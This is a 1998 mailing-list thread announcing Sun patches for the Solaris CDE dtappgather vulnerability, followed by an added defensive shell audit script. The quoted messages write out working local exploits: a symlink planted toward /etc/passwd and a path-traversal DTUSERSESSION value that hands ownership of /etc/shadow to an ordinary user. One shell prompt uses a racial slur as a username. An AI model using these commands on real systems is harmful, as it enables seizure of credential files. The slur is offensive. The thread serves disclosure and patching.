Re: /usr/dt/bin/dtappgather exploit

Steven Goldberg - SE - Seattle WA (steven.goldberg@West.Sun.COM)
Wed, 25 Feb 1998 10:59:38 -0800

Hi,

Sun has published the following patches to address this
vulnerability:

patches 104497 CDE 1.0.1: dtappgather patch
patches 104498 CDE 1.0.2: dtappgather patch
patches 104499 CDE 1.0.1_x86: dtappgather patch
patches 104500 CDE 1.0.2_x86: dtappgather patch
patches 105837 CDE 1.2: dtappgather Patch
patches 105838 CDE 1.2_x86: dtappgather Patch

thanks,

Steve

--------------

> Date: Tue, 24 Feb 1998 20:30:20 +0100
> From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
> Subject: Re: /usr/dt/bin/dtappgather exploit
> MIME-Version: 1.0
> Content-Transfer-Encoding: 7BIT
>
> >
> > I suppose you have learnt about CERT's advisory on dtappgather
> > program. Well, here's the exploit:
> >
> > nigg0r@host% ls -l /etc/passwd
> > -r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
> > nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
> > nigg0r@host% dtappgather
>
> the exploit is much simpler than that.
> hey, it's even documented on the man page :-)
>
> Simply
>
> $ id
> uid=6969(foo) gid=666(bar)
> $ ls -l /etc/shadow
> -r-------- 1 root sys 234 Nov 7 1999 /etc/shadow
> $ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
> $ ls -l /etc/shadow
> -r-xr-xr-x 1 foo bar 234 Nov 7 1999 /etc/shadow
>
>
> Anyway, your exploit has an advantage: it works (at least,
> in solaris 2.5), even after patching CDE according to CERT
> advisory.
> Solaris 2.6 seems to have the right permissions:
>
> /var/dt -> rwxr-xr-x
> /var/dt/appconfig -> rwxr-xr-x
> /var/dt/tmp -> rwxrwxrwt
>
> --
> J.A. Gutierrez So be easy and free
> when you're drinking with me
> I'm a man you don't meet every day
> finger me for PGP (the pogues)
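Added example, not from the original thread or from Sun/CDE: a POSIX sh audit that checks the /var/dt modes listed in the reply above, flags any symlink planted in the appmanager directory, and validates a session name of the DTUSERSESSION kind so it cannot escape that directory. The directory layout and expected modes come from the thread; a plain `readlink` is assumed to be available, and the root prefix argument is an addition so the audit can be run on a constructed tree.

```shell
#!/bin/sh
# Added example, not part of the original thread: a defensive audit for the
# two weaknesses discussed above, written against a root prefix ($1) so it
# can be run on a constructed tree as well as on "/" of a real host.

# Expected modes, taken from the Solaris 2.6 listing quoted in the reply.
EXPECTED_MODES='var/dt rwxr-xr-x
var/dt/appconfig rwxr-xr-x
var/dt/tmp rwxrwxrwt'

# Print the nine-character permission string of a path (e.g. rwxr-xr-x),
# or "missing" when the path does not exist.
mode_of() {
  if [ -e "$1" ]; then ls -ld "$1" | cut -c2-10; else echo missing; fi
}

# Wrapper-side check for the DTUSERSESSION trick: the session name must be a
# single path component, so empty names, names containing "/" and names
# starting with "." (which covers "..") are refused.
valid_session_name() {
  case "$1" in
    ''|*/*|.*) return 1 ;;
    *) return 0 ;;
  esac
}

# Print one line per finding (MODE ... or SYMLINK ...) and return 1 when
# anything was found, 0 when the tree under $1 looks as expected.
audit_dt_tree() {
  root=${1%/}
  out=$(
    echo "$EXPECTED_MODES" | while read -r rel want; do
      have=$(mode_of "$root/$rel")
      [ "$have" = "$want" ] || echo "MODE $root/$rel is $have, expected $want"
    done
    # dtappgather populates appmanager with per-session directories; a
    # symlink there (as planted by ln -s in the quoted exploit) is foreign.
    # readlink without -f is assumed available (Linux, BSD, macOS).
    for entry in "$root"/var/dt/appconfig/appmanager/* \
                 "$root"/var/dt/appconfig/appmanager/.*; do
      if [ -L "$entry" ]; then
        echo "SYMLINK $entry -> $(readlink "$entry")"
      fi
    done
  )
  if [ -n "$out" ]; then
    printf '%s\n' "$out"
    return 1
  fi
  return 0
}
```

Run as `audit_dt_tree /` on a CDE host; a non-zero exit with MODE or SYMLINK lines means the tree differs from the Solaris 2.6 layout quoted above.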